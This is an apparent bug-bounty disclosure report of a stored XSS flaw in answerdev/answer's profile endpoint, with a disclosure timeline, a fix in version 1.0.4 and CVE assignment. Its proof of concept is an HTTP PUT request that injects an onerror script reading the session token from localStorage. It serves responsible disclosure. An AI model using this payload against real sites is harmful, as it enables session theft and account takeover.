Function of modifying userinfo has storage xss vulnerability in answerdev/answer

Valid

Reported on

Jan 11th 2023


Description

This vulnerability allows a malicious user to submit malicious html code on the profile page, causing the identity token to be stolen as soon as another user/administrator accesses the profile page, resulting in the account being taken over by someone else

Proof of Concept

step1. Log in to a user account
step2. Send the following http request message to modify personal information

PUT /answer/api/v1/user/info HTTP/1.1
Host: localhost:9080
Authorization: 5f61e241-91a4-11ed-a458-0242ac110002
Content-Type: application/json
Content-Length: 264


{
    "display_name":"xiaoming",
    "username":"xiaoming",
    "avatar":{
        "type":"custom",
        "gravatar":"",
        "custom":"http://localhost:9080/uploads/avatar/4KbtWx52o5Y.png"
    },
    "bio":"",
    "website":"",
    "location":"",
    "bio_html":"<img src=x onerror=alert(localStorage.getItem('_a_lui_')) />"
}

xxs1.png

step3. When other users access the user's profile interface, they will be attacked by xss e.g: http://localhost:9080/users/xiaoming xxs2.png xx3.png

Impact

This vulnerability allows a malicious user to submit malicious html code on the profile page, causing the identity token to be stolen as soon as another user/administrator accesses the profile page, resulting in the account being taken over by someone else

References

We are processing your report and will contact the answerdev/answer team within 24 hours. a year ago
无在无不在 modified the report
a year ago
无在无不在 modified the report
a year ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
We have opened a pull request with a SECURITY.md for answerdev/answer to merge. a year ago
We have contacted a member of the answerdev/answer team and are waiting to hear back a year ago
We have sent a follow up to the answerdev/answer team. We will try again in 7 days. 10 months ago
answerdev/answer maintainer validated this vulnerability 10 months ago
无在无不在 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
无在无不在
10 months ago

Researcher


Hi Team, Could you help me apply for a CVE ID for this vulnerability?Thanks

无在无不在
10 months ago

Researcher


@admin

answerdev/answer maintainer marked this as fixed in 1.0.4 with commit c3001d 10 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
answerdev/answer maintainer published this vulnerability 10 months ago
Ben Harvie
10 months ago

Admin


A CVE has been assigned as requested:)

to join this conversation